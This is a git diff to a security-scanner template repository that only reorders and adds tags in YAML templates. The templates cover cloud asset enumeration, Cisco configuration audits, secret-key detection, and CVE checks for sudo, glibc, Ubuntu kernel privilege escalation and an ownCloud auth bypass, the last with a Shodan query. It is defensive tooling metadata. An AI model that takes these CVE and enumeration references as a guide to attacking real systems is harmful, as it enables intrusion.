diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml
index ab7ed36795..620985a1d7 100644
--- a/cloud/enum/aws-app-enum.yaml
+++ b/cloud/enum/aws-app-enum.yaml
@@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: cloud,cloud-enum,aws
+ tags: cloud,enum,cloud-enum,aws
self-contained: true
diff --git a/cloud/enum/aws-s3-bucket-enum.yaml b/cloud/enum/aws-s3-bucket-enum.yaml
index 7c692dda40..0c2e757474 100644
--- a/cloud/enum/aws-s3-bucket-enum.yaml
+++ b/cloud/enum/aws-s3-bucket-enum.yaml
@@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: cloud,cloud-enum,aws
+ tags: cloud,enum,cloud-enum,aws
self-contained: true
diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml
index 8a3ec2887d..b755245da3 100644
--- a/cloud/enum/azure-db-enum.yaml
+++ b/cloud/enum/azure-db-enum.yaml
@@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
- tags: cloud,cloud-enum,azure
+ tags: cloud,enum,cloud-enum,azure
self-contained: true
diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml
index 7ed0d03f3c..099ef9d73f 100644
--- a/cloud/enum/azure-vm-cloud-enum.yaml
+++ b/cloud/enum/azure-vm-cloud-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for Azure virtual machines via their registered DNS names.
metadata:
verified: true
- tags: cloud,cloud-enum,azure
+ tags: cloud,enum,cloud-enum,azure
self-contained: true
diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml
index 94737b9889..4d3450854c 100644
--- a/cloud/enum/azure-website-enum.yaml
+++ b/cloud/enum/azure-website-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for Azure websites that are registered and responding.
metadata:
verified: true
- tags: cloud,azure
+ tags: cloud,enum,azure
self-contained: true
diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml
index 25da290f22..6886017fb0 100644
--- a/cloud/enum/gcp-app-engine-enum.yaml
+++ b/cloud/enum/gcp-app-engine-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for App Engine Apps in GCP.
metadata:
verified: true
- tags: cloud,cloud-enum,gcp
+ tags: enum,cloud,cloud-enum,gcp
self-contained: true
diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml
index 6889edcaad..d0a3d5f33c 100644
--- a/cloud/enum/gcp-bucket-enum.yaml
+++ b/cloud/enum/gcp-bucket-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for open and protected buckets in GCP.
metadata:
verified: true
- tags: cloud,cloud-enum,gcp
+ tags: cloud,enum,cloud-enum,gcp
self-contained: true
diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml
index 45a6277ff7..519bd1a536 100644
--- a/cloud/enum/gcp-firebase-app-enum.yaml
+++ b/cloud/enum/gcp-firebase-app-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for Firebase Apps in GCP.
metadata:
verified: true
- tags: cloud,cloud-enum,gcp
+ tags: enum,cloud,cloud-enum,gcp
self-contained: true
diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml
index 27a2ee646e..7a04fd4f24 100644
--- a/cloud/enum/gcp-firebase-rtdb-enum.yaml
+++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml
@@ -8,7 +8,7 @@ info:
Searches for Firebase Realtime Databases in GCP.
metadata:
verified: true
- tags: cloud,cloud-enum,gcp
+ tags: enum,cloud,cloud-enum,gcp
self-contained: true
diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml
index b4c4db720d..95596fb198 100644
--- a/code/cves/2019/CVE-2019-14287.yaml
+++ b/code/cves/2019/CVE-2019-14287.yaml
@@ -14,7 +14,7 @@ info:
max-request: 2
vendor: canonical
product: ubuntu_linux
- tags: cve,cve2019,sudo,code,linux,privesc,local
+ tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true
code:
diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml
index f1cecabbdc..eeb5e77ee1 100644
--- a/code/cves/2023/CVE-2023-2640.yaml
+++ b/code/cves/2023/CVE-2023-2640.yaml
@@ -29,7 +29,7 @@ info:
max-request: 2
vendor: canonical
product: ubuntu_linux
- tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local
+ tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
self-contained: true
code:
diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml
index 4cdc94f210..f5c1743b14 100644
--- a/code/cves/2023/CVE-2023-49105.yaml
+++ b/code/cves/2023/CVE-2023-49105.yaml
@@ -24,7 +24,7 @@ info:
vendor: owncloud
product: owncloud
shodan-query: title:"owncloud"
- tags: cve,cve2023,owncloud,code,auth-bypass
+ tags: cve,cve2023,code,owncloud,auth-bypass
variables:
username: admin
diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml
index 79113dc40b..da3dd40d5c 100644
--- a/code/cves/2023/CVE-2023-4911.yaml
+++ b/code/cves/2023/CVE-2023-4911.yaml
@@ -19,7 +19,7 @@ info:
metadata:
max-request: 1
vendor: glibc
- tags: cve,cve2023,glibc,looneytunables,linux,privesc,local
+ tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
self-contained: true
code:
diff --git a/file/audit/cisco/configure-aaa-service.yaml b/file/audit/cisco/configure-aaa-service.yaml
index f7d0205634..fc9e359e36 100644
--- a/file/audit/cisco/configure-aaa-service.yaml
+++ b/file/audit/cisco/configure-aaa-service.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: file,audit,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml
index 9979a4f137..b723b1bb09 100644
--- a/file/audit/cisco/configure-service-timestamps-debug.yaml
+++ b/file/audit/cisco/configure-service-timestamps-debug.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: file,audit,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
index 4e35e84b29..655aa1a271 100644
--- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml
+++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: file,audit,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/disable-ip-source-route.yaml b/file/audit/cisco/disable-ip-source-route.yaml
index 613e2cac18..0830ed31b0 100644
--- a/file/audit/cisco/disable-ip-source-route.yaml
+++ b/file/audit/cisco/disable-ip-source-route.yaml
@@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: audit,file,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/disable-pad-service.yaml b/file/audit/cisco/disable-pad-service.yaml
index 447b23b3a0..d162aee105 100644
--- a/file/audit/cisco/disable-pad-service.yaml
+++ b/file/audit/cisco/disable-pad-service.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: audit,file,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/enable-secret-for-user-and-password.yaml b/file/audit/cisco/enable-secret-for-user-and-password.yaml
index 3311fd4078..997d947883 100644
--- a/file/audit/cisco/enable-secret-for-user-and-password.yaml
+++ b/file/audit/cisco/enable-secret-for-user-and-password.yaml
@@ -8,7 +8,7 @@ info:
To configure the system to time-stamp debugging or logging messages, use one of the service timestamps global configuration commands. Use the no form of this command to disable this service.
reference:
- https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm
- tags: cisco,config-audit,cisco-switch,file,router
+ tags: file,audit,cisco,config-audit,cisco-switch,router
file:
- extensions:
diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml
index 0b89bfecca..2e2a0a041e 100644
--- a/file/audit/cisco/logging-enable.yaml
+++ b/file/audit/cisco/logging-enable.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file
+ tags: audit,file,cisco,config-audit,cisco-switch
file:
- extensions:
diff --git a/file/audit/cisco/set-and-secure-passwords.yaml b/file/audit/cisco/set-and-secure-passwords.yaml
index 32548e8f61..71b5dbf567 100644
--- a/file/audit/cisco/set-and-secure-passwords.yaml
+++ b/file/audit/cisco/set-and-secure-passwords.yaml
@@ -12,7 +12,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: cisco,config-audit,cisco-switch,file
+ tags: audit,file,cisco,config-audit,cisco-switch
file:
- extensions:
diff --git a/file/electron/node-integration-enabled.yaml b/file/electron/node-integration-enabled.yaml
index e8cd71845d..df486a02e7 100644
--- a/file/electron/node-integration-enabled.yaml
+++ b/file/electron/node-integration-enabled.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/
- https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps
- tags: electron,file,nodejs
+ tags: electron,file,nodejs,xss
file:
- extensions:
diff --git a/file/keys/adobe/adobe-client.yaml b/file/keys/adobe/adobe-client.yaml
index 157d9bc44b..8c8c64872c 100644
--- a/file/keys/adobe/adobe-client.yaml
+++ b/file/keys/adobe/adobe-client.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go
metadata:
verified: true
- tags: adobe,file,token
+ tags: keys,file,adobe,token
file:
- extensions:
diff --git a/file/keys/adobe/adobe-secret.yaml b/file/keys/adobe/adobe-secret.yaml
index 4693999028..0c10a5510c 100644
--- a/file/keys/adobe/adobe-secret.yaml
+++ b/file/keys/adobe/adobe-secret.yaml
@@ -11,7 +11,7 @@ info:
- https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/
metadata:
verified: true
- tags: adobe,oauth,file,token
+ tags: file,keys,adobe,oauth,token
file:
- extensions:
diff --git a/file/keys/age/age-identity-secret-key.yaml b/file/keys/age/age-identity-secret-key.yaml
index 93865a105d..8a6fc3d51b 100644
--- a/file/keys/age/age-identity-secret-key.yaml
+++ b/file/keys/age/age-identity-secret-key.yaml
@@ -10,7 +10,7 @@ info:
- https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type
metadata:
verified: true
- tags: age-encryption,file,token
+ tags: file,keys,age-encryption,token
file:
- extensions:
diff --git a/file/keys/age/age-recipient-public-key.yaml b/file/keys/age/age-recipient-public-key.yaml
index 916a291a6a..19aeaee933 100644
--- a/file/keys/age/age-recipient-public-key.yaml
+++ b/file/keys/age/age-recipient-public-key.yaml
@@ -10,7 +10,7 @@ info:
- https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type
metadata:
verified: true
- tags: age-encryption,file,token
+ tags: file,keys,age-encryption,token
file:
- extensions:
diff --git a/file/keys/airtable-key.yaml b/file/keys/airtable-key.yaml
index 5ebf9b4354..581fb6bb78 100644
--- a/file/keys/airtable-key.yaml
+++ b/file/keys/airtable-key.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go
metadata:
verified: true
- tags: airtable,file,token
+ tags: keys,file,airtable,token
file:
- extensions:
- all
diff --git a/file/keys/amazon/amazon-account-id.yaml b/file/keys/amazon/amazon-account-id.yaml
index 76efead567..aa7041daa4 100644
--- a/file/keys/amazon/amazon-account-id.yaml
+++ b/file/keys/amazon/amazon-account-id.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
verified: true
- tags: aws,amazon,token,file
+ tags: file,keys,aws,amazon,token
file:
- extensions:
diff --git a/file/keys/amazon/amazon-mws-auth-token.yaml b/file/keys/amazon/amazon-mws-auth-token.yaml
index 118d87e6ff..4ca548e10a 100644
--- a/file/keys/amazon/amazon-mws-auth-token.yaml
+++ b/file/keys/amazon/amazon-mws-auth-token.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
- tags: token,file,amazon,auth,mws
+ tags: file,keys,token,amazon,auth,mws
file:
- extensions:
diff --git a/file/keys/amazon/amazon-session-token.yaml b/file/keys/amazon/amazon-session-token.yaml
index 9b8ae08e39..fd64848174 100644
--- a/file/keys/amazon/amazon-session-token.yaml
+++ b/file/keys/amazon/amazon-session-token.yaml
@@ -13,7 +13,7 @@ info:
cwe-id: CWE-200
metadata:
verified: true
- tags: aws,amazon,token,file,session
+ tags: file,keys,aws,amazon,token,session
file:
- extensions:
diff --git a/file/keys/amazon/amazon-sns-token.yaml b/file/keys/amazon/amazon-sns-token.yaml
index a0945cddbf..6dc4dbce11 100644
--- a/file/keys/amazon/amazon-sns-token.yaml
+++ b/file/keys/amazon/amazon-sns-token.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: file,token,amazon,aws,sns
+ tags: file,keys,token,amazon,aws,sns
file:
- extensions:
diff --git a/file/keys/amazon/aws-access-id.yaml b/file/keys/amazon/aws-access-id.yaml
index ba69c887f7..2c595fc1a8 100644
--- a/file/keys/amazon/aws-access-id.yaml
+++ b/file/keys/amazon/aws-access-id.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: token,file,aws,amazon
+ tags: file,keys,token,aws,amazon
file:
- extensions:
diff --git a/file/keys/amazon/aws-cognito.yaml b/file/keys/amazon/aws-cognito.yaml
index 9bb20958a6..427f17c0d3 100644
--- a/file/keys/amazon/aws-cognito.yaml
+++ b/file/keys/amazon/aws-cognito.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: token,file,aws,amazon
+ tags: file,keys,token,aws,amazon
file:
- extensions:
diff --git a/file/keys/atlassian/atlassian-api-token.yaml b/file/keys/atlassian/atlassian-api-token.yaml
index 31b39e97ce..5e0d7e7cf6 100644
--- a/file/keys/atlassian/atlassian-api-token.yaml
+++ b/file/keys/atlassian/atlassian-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml
metadata:
verified: true
- tags: atlassian,file,token,api
+ tags: file,keys,atlassian,token,api
file:
- extensions:
diff --git a/file/keys/azure/azure-connection-string.yaml b/file/keys/azure/azure-connection-string.yaml
index 15699b3bbd..85bce1f1d8 100644
--- a/file/keys/azure/azure-connection-string.yaml
+++ b/file/keys/azure/azure-connection-string.yaml
@@ -10,7 +10,7 @@ info:
- https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string
metadata:
verified: true
- tags: azure,file,token
+ tags: file,keys,azure,token
file:
- extensions:
diff --git a/file/keys/beamer-api-token.yaml b/file/keys/beamer-api-token.yaml
index 0e074c8f8a..a9b3292a09 100644
--- a/file/keys/beamer-api-token.yaml
+++ b/file/keys/beamer-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go
metadata:
verified: true
- tags: beamer,file,token
+ tags: file,keys,beamer,token
file:
- extensions:
- all
diff --git a/file/keys/bitbucket/bitbucket-client-id.yaml b/file/keys/bitbucket/bitbucket-client-id.yaml
index 1e5f6e28bc..d1f5031da1 100644
--- a/file/keys/bitbucket/bitbucket-client-id.yaml
+++ b/file/keys/bitbucket/bitbucket-client-id.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go
metadata:
verified: true
- tags: bitbucket,file,token
+ tags: file,keys,bitbucket,token
file:
- extensions:
diff --git a/file/keys/bitbucket/bitbucket-client-secret.yaml b/file/keys/bitbucket/bitbucket-client-secret.yaml
index ac4853d8b5..6f71c12991 100644
--- a/file/keys/bitbucket/bitbucket-client-secret.yaml
+++ b/file/keys/bitbucket/bitbucket-client-secret.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go
metadata:
verified: true
- tags: bitbucket,file,token
+ tags: keys,file,bitbucket,token
file:
- extensions:
diff --git a/file/keys/bittrex/bittrex-access-key.yaml b/file/keys/bittrex/bittrex-access-key.yaml
index d70d8aa532..89273b61d7 100644
--- a/file/keys/bittrex/bittrex-access-key.yaml
+++ b/file/keys/bittrex/bittrex-access-key.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go
metadata:
verified: true
- tags: bittrex,file,token
+ tags: file,keys,bittrex,token
file:
- extensions:
diff --git a/file/keys/bittrex/bittrex-secret-key.yaml b/file/keys/bittrex/bittrex-secret-key.yaml
index 302d0277d7..65a65cb195 100644
--- a/file/keys/bittrex/bittrex-secret-key.yaml
+++ b/file/keys/bittrex/bittrex-secret-key.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go
metadata:
verified: true
- tags: bittrex,file,token
+ tags: file,keys,bittrex,token
file:
- extensions:
diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml
index 14efab44d2..2a76090cad 100644
--- a/file/keys/branch-key.yaml
+++ b/file/keys/branch-key.yaml
@@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
- tags: token,file
+ tags: file,keys,token
file:
- extensions:
- all
diff --git a/file/keys/clojars-api-token.yaml b/file/keys/clojars-api-token.yaml
index bbbd9daed7..739bac83b7 100644
--- a/file/keys/clojars-api-token.yaml
+++ b/file/keys/clojars-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go
metadata:
verified: true
- tags: clojars,file,token
+ tags: file,keys,clojars,token
file:
- extensions:
- all
diff --git a/file/keys/cloudinary.yaml b/file/keys/cloudinary.yaml
index e09cc1e7c5..a1215b7168 100644
--- a/file/keys/cloudinary.yaml
+++ b/file/keys/cloudinary.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
- tags: token,file,cloudinary
+ tags: keys,file,token,cloudinary
file:
- extensions:
- all
diff --git a/file/keys/code-climate-token.yaml b/file/keys/code-climate-token.yaml
index ef9a00670f..dad78e890c 100644
--- a/file/keys/code-climate-token.yaml
+++ b/file/keys/code-climate-token.yaml
@@ -14,7 +14,7 @@ info:
cwe-id: CWE-200
metadata:
verified: true
- tags: codeclimate,token,file
+ tags: file,keys,codeclimate,token
file:
- extensions:
- all
diff --git a/file/keys/codecov-access-token.yaml b/file/keys/codecov-access-token.yaml
index b84a3a26a6..6362ff6539 100644
--- a/file/keys/codecov-access-token.yaml
+++ b/file/keys/codecov-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go
metadata:
verified: true
- tags: codecov,file,token
+ tags: file,keys,codecov,token
file:
- extensions:
- all
diff --git a/file/keys/coinbase-access-token.yaml b/file/keys/coinbase-access-token.yaml
index f23a608dac..c93c55a114 100644
--- a/file/keys/coinbase-access-token.yaml
+++ b/file/keys/coinbase-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go
metadata:
verified: true
- tags: coinbase,file,token
+ tags: file,keys,coinbase,token
file:
- extensions:
- all
diff --git a/file/keys/confluent/confluent-access-token.yaml b/file/keys/confluent/confluent-access-token.yaml
index 8dbd4af058..e9c312f276 100644
--- a/file/keys/confluent/confluent-access-token.yaml
+++ b/file/keys/confluent/confluent-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go
metadata:
verified: true
- tags: confluent,file,token
+ tags: file,keys,confluent,token
file:
- extensions:
diff --git a/file/keys/confluent/confluent-secret-token.yaml b/file/keys/confluent/confluent-secret-token.yaml
index edc2828201..5fb2598ad4 100644
--- a/file/keys/confluent/confluent-secret-token.yaml
+++ b/file/keys/confluent/confluent-secret-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go
metadata:
verified: true
- tags: confluent,file,token
+ tags: file,keys,confluent,token
file:
- extensions:
diff --git a/file/keys/contentful-api-token.yaml b/file/keys/contentful-api-token.yaml
index ab3facb00f..4e1ae01cb4 100644
--- a/file/keys/contentful-api-token.yaml
+++ b/file/keys/contentful-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go
metadata:
verified: true
- tags: contentful,file,token
+ tags: file,keys,contentful,token
file:
- extensions:
- all
diff --git a/file/keys/cratesio-api-key.yaml b/file/keys/cratesio-api-key.yaml
index 9134c3fb19..11bbb08bb5 100644
--- a/file/keys/cratesio-api-key.yaml
+++ b/file/keys/cratesio-api-key.yaml
@@ -15,7 +15,7 @@ info:
cwe-id: CWE-200
metadata:
verified: true
- tags: crates,token,file
+ tags: keys,file,crates,token
file:
- extensions:
- all
diff --git a/file/keys/credentials.yaml b/file/keys/credentials.yaml
index 04403dfb9e..5694bf4da4 100644
--- a/file/keys/credentials.yaml
+++ b/file/keys/credentials.yaml
@@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
- tags: token,file,auth
+ tags: file,keys,token,auth
file:
- extensions:
- all
diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml
index c952a2efe2..2b2d03734c 100644
--- a/file/keys/databricks-api-token.yaml
+++ b/file/keys/databricks-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go
metadata:
verified: true
- tags: databricks,file,token
+ tags: file,keys,databricks,token
file:
- extensions:
- all
diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml
index 95f9a864ef..fd6718ee42 100644
--- a/file/keys/datadog-access-token.yaml
+++ b/file/keys/datadog-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go
metadata:
verified: true
- tags: datadog,file,token
+ tags: keys,file,datadog,token
file:
- extensions:
- all
diff --git a/file/keys/digitalocean/digitalocean-access-token.yaml b/file/keys/digitalocean/digitalocean-access-token.yaml
index 9019dffd4b..b22d656159 100644
--- a/file/keys/digitalocean/digitalocean-access-token.yaml
+++ b/file/keys/digitalocean/digitalocean-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.digitalocean.com/reference/api/
metadata:
verified: true
- tags: digitalocean,file,token
+ tags: keys,file,digitalocean,token
file:
- extensions:
diff --git a/file/keys/digitalocean/digitalocean-personal-access.yaml b/file/keys/digitalocean/digitalocean-personal-access.yaml
index af5cdcc8d7..569c7d1355 100644
--- a/file/keys/digitalocean/digitalocean-personal-access.yaml
+++ b/file/keys/digitalocean/digitalocean-personal-access.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.digitalocean.com/reference/api/
metadata:
verified: true
- tags: digitalocean,file,token
+ tags: file,keys,digitalocean,token
file:
- extensions:
diff --git a/file/keys/digitalocean/digitalocean-refresh-token.yaml b/file/keys/digitalocean/digitalocean-refresh-token.yaml
index 75c2d8e6ea..7c4f207308 100644
--- a/file/keys/digitalocean/digitalocean-refresh-token.yaml
+++ b/file/keys/digitalocean/digitalocean-refresh-token.yaml
@@ -9,7 +9,7 @@ info:
- https://docs.digitalocean.com/reference/api/
metadata:
verified: true
- tags: digitalocean,file,token
+ tags: file,keys,digitalocean,token
file:
- extensions:
diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml
index 7b4b9d1c34..c80a733a3a 100644
--- a/file/keys/discord/discord-api-token.yaml
+++ b/file/keys/discord/discord-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go
metadata:
verified: true
- tags: discord,file,token
+ tags: file,keys,discord,token
file:
- extensions:
diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml
index aae8b6e432..1d28f5e082 100644
--- a/file/keys/discord/discord-cilent-secret.yaml
+++ b/file/keys/discord/discord-cilent-secret.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go
metadata:
verified: true
- tags: discord,file,token
+ tags: file,keys,discord,token
file:
- extensions:
diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml
index 2f3bebeb7f..4c4901375c 100644
--- a/file/keys/discord/discord-client-id.yaml
+++ b/file/keys/discord/discord-client-id.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go
metadata:
verified: true
- tags: discord,file,token
+ tags: file,keys,discord,token
file:
- extensions:
diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml
index 18023a9325..91516a4b2f 100644
--- a/file/keys/doppler-api-token.yaml
+++ b/file/keys/doppler-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go
metadata:
verified: true
- tags: doppler,file,token
+ tags: file,keys,doppler,token
file:
- extensions:
- all
diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml
index 2ce8ae2ae3..11e7459d5d 100644
--- a/file/keys/droneci-access-token.yaml
+++ b/file/keys/droneci-access-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go
metadata:
verified: true
- tags: droneci,file,token
+ tags: file,keys,droneci,token
file:
- extensions:
- all
diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml
index 32ccc4a2a9..7d15d4cc4f 100644
--- a/file/keys/dropbox/dropbox-api-token.yaml
+++ b/file/keys/dropbox/dropbox-api-token.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go
metadata:
verified: true
- tags: dropbox,file,token
+ tags: file,keys,dropbox,token
file:
- extensions:
diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml
index 358ddfbaf2..446db9a521 100644
--- a/file/keys/dropbox/dropbox-longlived-token.yaml
+++ b/file/keys/dropbox/dropbox-longlived-token.yaml
@@ -9,7 +9,7 @@ info:
